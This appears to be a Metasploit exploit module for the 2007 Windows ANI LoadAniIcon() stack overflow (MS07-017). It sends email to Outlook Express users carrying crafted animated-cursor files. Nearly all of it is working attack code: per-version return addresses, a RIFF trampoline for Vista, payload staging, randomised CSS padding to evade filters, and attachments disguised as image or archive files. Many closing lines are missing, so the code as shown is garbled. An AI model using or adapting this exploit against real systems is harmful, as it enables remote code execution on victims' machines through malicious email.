# $Id: ms07_017_ani_loadimage_chunksize.rb 10394 2010-09-20 08:06:27Z jduck $
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
# This module sends email messages via smtp
include Msf::Exploit::Remote::SMTPDeliver
def initialize(info = {})
'Name' => 'Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)',
'Description'=> %q{
This module exploits a buffer overflow vulnerability in the
LoadAniIcon() function of USER32.dll. The flaw is triggered
through Outlook Express by using the CURSOR style sheet
directive to load a malicious .ANI file.
This vulnerability was discovered by Alexander Sotirov of Determina
and was rediscovered, in the wild, by McAfee.
'License'=> MSF_LICENSE,
'Author' =>
'hdm', # First version
'skape', # Vista support
'Version'=> '$Revision: 10394 $',
'References' =>
['MSB', 'MS07-017'],
['CVE', '2007-0038'],
['CVE', '2007-1765'],
['OSVDB', '33629'],
['BID', '23194'],
['URL', 'http://www.microsoft.com/technet/security/advisory/935423.mspx'],
['URL', 'http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp'],
['URL', 'http://www.determina.com/security.research/vulnerabilities/ani-header.html'],
'Stance' => Msf::Exploit::Stance::Passive,
'DefaultOptions' =>
# Cause internet explorer to exit after the code hits
'EXITFUNC' => 'process',
'Space' => 1024 + (rand(1000)),
'MinNops' => 32,
'ConnectionType' => '-bind -find',
'StackAdjustment' => -3500,
'Platform' => 'win',
# Use multiple cursor URLs to try all targets. This can result in
# multiple, sequential sessions
[ 'Automatic', {} ],
# The following targets use call [ebx+4], just like the original exploit
# Partial overwrite doesn't work for Outlook Express
[ 'Windows XP SP2 user32.dll 5.1.2600.2622', { 'Ret' => 0x25ba, 'Len' => 2 }],
# Should work for all English XP SP2
[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],
# Supplied by Fabrice MOURRON <fab[at]revhosts.net>
[ 'Windows XP SP2 userenv.dll French', { 'Ret' => 0x7699c81a }],
# Should work for English XP SP0/SP1
[ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }],
# Should work for English 2000 SP0-SP4+
[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],
# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
# of the RIFF chunk itself.The length field of the RIFF chunk
# tag contains a short jump into an embedded riff chunk that
# makes a long relative jump into the actual payload.
[ 'Windows Vista user32.dll 6.0.6000.16386',
'Ret' => 0x700b,
'Len' => 2,
# On Vista, the pages that contain the RIFF are read-only.
# In-place decoders cannot be used.
'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw }
# Supplied by ramon[at]risesecurity.org
# call [ebx+4]
[ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }],
[ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }],
[ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }],
# call [esi+4]
[ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }],
[ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }]
'DisclosureDate' => 'Mar 28 2007',
'DefaultTarget' => 0))
def autofilter
def exploit
exts = ['bmp', 'wav', 'png', 'zip', 'tar']
gext =exts[rand(exts.length)]
name = rand_text_alpha(rand(10)+1) + ".#{gext}"
anis = {}
html =
"<html><head><title>" +
rand_text_alphanumeric(rand(128)+4) +
"</title>" +
"</head><body>" + rand_text_alphanumeric(rand(128)+1)
mytargs = (target.name =~ /Automatic/) ? targets : [target]
if target.name =~ /Automatic/
targets.each_index { |i|
next if not targets[i].ret
acid = generate_cid
html << generate_div("cid:#{acid}")
# Re-generate the payload, using the explicit target
return if ((p = regenerate_payload(nil, nil, targets[i])) == nil)
# Generate an ANI file for this target
anis[acid] = generate_ani(p, targets[i])
acid = generate_cid
html << generate_div("cid:#{acid}")
# Re-generate the payload, using the explicit target
return if ((p = regenerate_payload(nil, nil, target)) == nil)
# Generate an ANI file for this target
anis[acid] = generate_ani(p, target)
html << "</body></html>"
msg = Rex::MIME::Message.new
msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
msg.to = datastore['MAILTO']
msg.from = datastore['MAILFROM']
msg.add_part(Rex::Text.encode_base64(html, "\r\n"), "text/html", "base64", "inline")
anis.each_pair do |cid,ani|
part = msg.add_part_attachment(ani, cid + "." + gext)
part.header.set("Content-ID", "<"+cid+">")
print_status("Waiting for a payload session (backgrounding)...")
def generate_cid
def generate_div(url)
"<div style='" +
generate_css_padding() +
Rex::Text.to_rand_case("cursor") +
generate_css_padding() +
":" +
generate_css_padding() +
Rex::Text.to_rand_case("url(") +
generate_css_padding() +
"\"#{url}\"" +
generate_css_padding() +
");" +
generate_css_padding() +
"'>" +
generate_padding() +
def generate_ani(payload, target)
# Build the first ANI header
anih_a = [
36,# DWORD cbSizeof
rand(128)+16,# DWORD cFrames
rand(1024)+1,# DWORD cSteps
0, # DWORD cx,cy(reserved - 0)
0, # DWORD cBitCount, cPlanes (reserved - 0)
0, 0, 0, # JIF jifRate
1# DWORD flags
anih_b = nil
if (target.name =~ /Vista/)
# Vista has ebp=80, eip=84
anih_b = rand_text(84)
# Patch local variables and loop counters
anih_b[68, 12] = [0].pack("V") * 3
# XP/2K has ebp=76 and eip=80
anih_b = rand_text(80)
# Patch local variables and loop counters
anih_b[64, 12] = [0].pack("V") * 3
# Overwrite the return with address of a "call ptr [ebx+4]"
anih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4]
# Begin the ANI chunk
riff = "ACON"
# Calculate the data offset for the trampoline chunk and add
# the trampoline chunk if we're attacking Vista
if target.name =~ /Vista/
trampoline_doffset = riff.length + 8
riff << generate_trampoline_riff_chunk
# Insert random RIFF chunks
0.upto(rand(128)+16) do |i|
riff << generate_riff_chunk()
# Embed the first ANI header
riff << "anih" + [anih_a.length].pack('V') + anih_a
# Insert random RIFF chunks
0.upto(rand(128)+16) do |i|
riff << generate_riff_chunk()
# Trigger the return address overwrite
riff << "anih" + [anih_b.length].pack('V') + anih_b
# If this is a Vista target, then we need to align the length of the
# RIFF chunk so that the low order two bytes are equal to a jmp $+0x16
if target.name =~ /Vista/
plen= (riff.length & 0xffff0000) | 0x0eeb
plen += 0x10000 if (plen - 8) < riff.length
riff << generate_riff_chunk((plen - 8) - riff.length)
# Replace the operand to the relative jump to point into the actual
# payload itself which comes after the riff chunk
riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 5].pack('V')
# Place the RIFF chunk in front and off we go
ret = "RIFF" + [riff.length].pack('V') + riff
# We copy the encoded payload to the stack because sometimes the RIFF
# image is mapped in read-only pages.This would prevent in-place
# decoders from working, and we can't have that.
ret << Rex::Arch::X86.copy_to_stack(payload.encoded.length)
# Place the real payload right after it.
ret << payload.encoded
# Generates a riff chunk with the first bytes of the data being a relative
# jump.This is used to bounce to the actual payload
def generate_trampoline_riff_chunk
tag = Rex::Text.to_rand_case(rand_text_alpha(4))
dat = "\xe9\xff\xff\xff\xff" + rand_text(1) + (rand_text(rand(256)+1) * 2)
tag + [dat.length].pack('V') + dat
def generate_riff_chunk(len = (rand(256)+1) * 2)
tag = Rex::Text.to_rand_case(rand_text_alpha(4))
dat = rand_text(len)
tag + [dat.length].pack('V') + dat
def generate_css_padding
buf =
generate_whitespace() +
"/*" +
generate_whitespace() +
generate_padding() +
generate_whitespace() +
"*/" +
def generate_whitespace
len = rand(100)+2
set = "\x09\x20\x0d\x0a"
buf = ''
while (buf.length < len)
buf << set[rand(set.length)].chr
def generate_padding